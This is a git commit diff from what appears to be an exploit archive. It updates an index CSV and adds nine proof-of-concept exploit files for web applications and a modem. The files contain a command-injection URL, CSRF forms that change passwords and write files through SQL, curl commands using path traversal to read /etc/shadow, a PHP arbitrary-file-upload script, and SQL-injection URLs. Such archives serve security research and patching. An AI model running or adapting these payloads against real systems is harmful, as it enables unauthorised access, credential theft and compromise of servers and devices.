DB: 2016-01-01
9 new exploits
This commit is contained in:
parent
ae8b3fb122
commit
f89cce16df
11 changed files with 131 additions and 5 deletions
13
files.csv
13
files.csv
|
@ -382,7 +382,7 @@ id,file,description,date,author,platform,type,port
|
|||
407,platforms/cgi/webapps/407.txt,"AWStats (5.0-6.3) Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0
|
||||
408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0
|
||||
409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23
|
||||
411,platforms/linux/local/411.c,"Sendmail 8.11.x Exploit (i386-Linux)",2001-01-01,sd,linux,local,0
|
||||
411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0
|
||||
413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
|
||||
416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0
|
||||
417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0
|
||||
|
@ -14526,7 +14526,7 @@ id,file,description,date,author,platform,type,port
|
|||
16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
|
||||
16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,metasploit,windows,remote,0
|
||||
16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,metasploit,windows,remote,0
|
||||
16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 Username Overflow",2010-07-03,metasploit,windows,remote,0
|
||||
16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,metasploit,windows,remote,0
|
||||
16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0
|
||||
16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
|
||||
16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,metasploit,windows,remote,5554
|
||||
|
@ -35383,3 +35383,12 @@ id,file,description,date,author,platform,type,port
|
|||
39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
|
||||
39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
|
||||
39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root Vulnerability",2015-12-30,"Larry W. Cashdollar",linux,local,0
|
||||
39135,platforms/php/webapps/39135.php,"WordPress Felici Theme 'uploadify.php' Arbitrary File Upload Vulnerability",2014-03-23,"CaFc Versace",php,webapps,0
|
||||
39136,platforms/php/webapps/39136.txt,"Symphony <= 2.2.4 Cross Site Request Forgery Vulnerability",2014-03-24,"High-Tech Bridge",php,webapps,0
|
||||
39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS 'pcm.cgi' Remote Command Execution Vulnerability",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
|
||||
39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross Site Request Forgery Vulnerability",2014-04-12,"Blessen Thomas",hardware,remote,0
|
||||
39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass Vulnerability",2014-04-05,"Wesley Henrique",php,webapps,0
|
||||
39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component 'index.php' SQL Injection Vulnerability",2014-04-08,Lazmania61,php,webapps,0
|
||||
39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
|
||||
39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
|
||||
39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/cgi/webapps/39137.txt
Executable file
9
platforms/cgi/webapps/39137.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/66549/info
|
||||
|
||||
Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
|
||||
|
||||
Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cgi-bin/pcm.cgi?download=;id|
|
19
platforms/hardware/remote/39138.html
Executable file
19
platforms/hardware/remote/39138.html
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/66593/info
|
||||
|
||||
ICOMM 610 is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
|
||||
|
||||
ICOMM 610 01.01.08.991 and prior are vulnerable.
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC --->
|
||||
<body>
|
||||
<form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
|
||||
<input type="hidden" name="PasswdEnable" value="on" />
|
||||
<input type="hidden" name="New_Passwd" value="test" />
|
||||
<input type="hidden" name="Confirm_New_Passwd" value="test" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
23
platforms/jsp/webapps/39142.txt
Executable file
23
platforms/jsp/webapps/39142.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
source: http://www.securityfocus.com/bid/66817/info
|
||||
|
||||
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
|
||||
|
||||
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
|
||||
|
||||
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
|
||||
|
||||
curl -i -s -k -X 'POST' \
|
||||
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
|
||||
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
|
||||
'hxxps://www.example.com/servlet/MGConfigData'
|
||||
|
||||
POST /servlet/MGConfigData HTTP/1.1
|
||||
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com
|
||||
|
||||
POST /servlet/MGConfigData HTTP/1.1
|
||||
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com
|
||||
|
||||
curl -i -s -k -X 'POST' \
|
||||
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
|
||||
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
|
||||
'hxxps://www.example.com/servlet/MGConfigData'
|
12
platforms/jsp/webapps/39143.txt
Executable file
12
platforms/jsp/webapps/39143.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/66817/info
|
||||
|
||||
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
|
||||
|
||||
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
|
||||
|
||||
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
|
||||
|
||||
curl -i -s -k -X 'POST' \
|
||||
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
|
||||
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
|
||||
'hxxps://www.example.com/servlet/Installer'
|
|
@ -399,6 +399,6 @@ int main(int argc, char *argv[])
|
|||
|
||||
/* That's all. */
|
||||
|
||||
|
||||
|
||||
// milw0rm.com [2001-01-01]
|
||||
|
||||
|
||||
// milw0rm.com [2001-01-01]
|
||||
|
|
21
platforms/php/webapps/39135.php
Executable file
21
platforms/php/webapps/39135.php
Executable file
|
@ -0,0 +1,21 @@
|
|||
source: http://www.securityfocus.com/bid/66490/info
|
||||
|
||||
The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.
|
||||
|
||||
Felici 1.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
$uploadfile="cafc.php.jpg";
|
||||
$ch =
|
||||
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('Filedata'=>"@$uploadfile",
|
||||
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
?>
|
9
platforms/php/webapps/39136.txt
Executable file
9
platforms/php/webapps/39136.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/66536/info
|
||||
|
||||
Symphony is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
|
||||
|
||||
Symphony version 2.3.1 and prior are vulnerable.
|
||||
|
||||
<img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20">
|
10
platforms/php/webapps/39139.txt
Executable file
10
platforms/php/webapps/39139.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/66677/info
|
||||
|
||||
PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
|
||||
|
||||
Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.
|
||||
|
||||
PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable
|
||||
|
||||
&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
|
||||
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290
|
7
platforms/php/webapps/39140.txt
Executable file
7
platforms/php/webapps/39140.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/66708/info
|
||||
|
||||
Inneradmission component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_inneradmission&id=1'a
|
7
platforms/php/webapps/39141.txt
Executable file
7
platforms/php/webapps/39141.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/66769/info
|
||||
|
||||
eazyCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?tab=[SQLI]
|
Loading…
Add table
Reference in a new issue